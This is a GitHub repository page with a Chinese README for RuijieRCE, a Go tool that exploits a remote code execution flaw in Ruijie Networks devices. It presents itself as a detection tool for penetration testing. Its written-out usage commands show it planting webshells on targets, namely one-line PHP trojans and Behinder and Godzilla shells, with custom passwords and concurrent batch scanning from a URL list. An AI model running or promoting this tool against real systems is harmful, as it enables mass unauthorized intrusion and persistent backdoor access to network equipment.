Skip to content
/ RuijieRCE Public

锐捷Ruijie Networks RCE漏洞检测工具,可批量检测上🔪、冰蝎、哥斯拉

83 stars 15 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

1ight-2020/RuijieRCE

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

17 Commits
funcs
funcs
 
 
task
task
 
 
vars
vars
 
 
README.md
README.md
 
 
cknife.png
cknife.png
 
 
go.mod
go.mod
 
 
main.go
main.go
 
 

Repository files navigation

RuijieRCE

Ruijie Networks RCE漏洞检测工具,为方便渗透测试使用,可以批量检测,也会生成历史记录。同时也为防止他人恶意使用,可自定义GET参数密码,该密码由sha256加密,难以破解。同时也可以上传冰蝎马或者哥斯拉马。批量检测支持并发。

参数

Usage of ./RuijieRCE:
  -f string
    	导入.txt文件批量扫描
  -k string
    	写入shell密钥,一句话马默认为cmd,哥斯拉马默认为key,冰蝎马没有密钥
  -n string
    	写入shell默认一句话马🐎,B冰蝎马,G哥斯拉马
  -p string
    	写入shell密码,一句话马默认为cmd,哥斯拉马默认为pass,冰蝎马默认为rebeyond
  -u string
    	目标URL

使用

检测到漏洞后生成随机数.php文件执行命令,也可以上菜刀。

上传一句话木马

GET密码:cmd POST密码:cmd

./RuijieRCE -u http://127.0.0.1:4430

设置密码

-n参数为POST密码,-p参数为GET密码 这两个参数缺省时均为cmd,可以只设置一个或者同时都设置

./RuijieRCE -u http://127.0.0.1:4430 -n asd -p zxc

上传冰蝎马

默认密钥为rebeyond,也可以使用-p参数修改

./RuijieRCE -u http://127.0.0.1:4430 -n B -p rebeyond

上传哥斯拉马

哥斯拉加密器使用BASE64,默认密码为pass,密钥为key

./RuijieRCE -u http://127.0.0.1:4430 -n G -p pass -k key

批量测试

批量测试时也可以设置上传冰蝎马、哥斯拉马以及自定义密码

./RuijieRCE -f url.txt

About

锐捷Ruijie Networks RCE漏洞检测工具,可批量检测上🔪、冰蝎、哥斯拉

Resources

Readme
Activity

Stars

83 stars

Watchers

3 watching

Forks

15 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages